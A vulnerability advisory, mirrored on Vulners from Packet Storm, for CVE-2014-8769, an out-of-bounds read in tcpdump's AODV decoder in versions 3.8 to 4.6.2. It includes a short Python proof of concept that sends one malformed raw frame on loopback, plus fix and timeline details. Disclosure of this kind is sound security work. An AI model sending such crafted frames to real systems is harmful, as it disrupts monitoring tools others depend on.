Lucene search
K

tcpdump 4.6.2 AOVD Unreliable Output

🗓️ 19 Nov 2014 00:00:00Reported by Steffen BauchType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 51 Views

tcpdump 4.6.2 AOVD Unreliable Output CVE-2014-876

Related
Code
`CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload  
  
1. Background  
  
tcpdump is a powerful command-line packet analyzer. It allows the user   
to intercept and display TCP/IP and other packets being transmitted or   
received over a network to which the computer is attached.  
  
2. Summary Information  
  
It was found out that malformed network traffic (AOVD-based) can lead to   
an abnormal behaviour if verbose output of tcpdump monitoring the   
network is used.  
  
3. Technical Description  
  
The application decoder for the Ad hoc On-Demand Distance Vector (AODV)   
protocol fails to perform input validation and performs unsafe   
out-of-bound accesses. The application will usually not crash, but   
perform out-of-bounds accesses and output/leak larger amounts of invalid   
data, which might lead to dropped packets. It is unknown if other   
payload exists that might trigger segfaults.  
  
To reproduce start tcpdump on a network interface  
  
sudo tcpdump -i lo -s 0 -n -v  
  
(running the program with sudo might hide a possible segfault message on   
certain environments, see dmesg for details)  
  
and use the following python program to generate a frame on the network   
(might also need sudo):  
  
#!/usr/bin/env python  
from socket import socket, AF_PACKET, SOCK_RAW  
s = socket(AF_PACKET, SOCK_RAW)  
s.bind(("lo", 0))  
  
aovd_frame =   
"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"  
  
s.send(aovd_frame)  
  
4. Affected versions  
  
Affected versions are 3.8 through 4.6.2  
  
5. Fix  
  
The problem is fixed in the upcoming version tcpdump 4.7.0  
  
6. Advisory Timeline  
  
2014-11-08 Discovered  
2014-11-09 Requested CVE  
2014-11-11 Reported vendor by email  
2014-11-12 Vendor made a fix available as repository patch  
2014-11-13 CVE number received  
2014-11-13 Published CVE advisory  
  
7. Credit  
  
The issue was found by  
  
Steffen Bauch  
Twitter: @steffenbauch  
http://steffenbauch.de  
  
using a slightly enhanced version of american fuzzy lop   
(https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation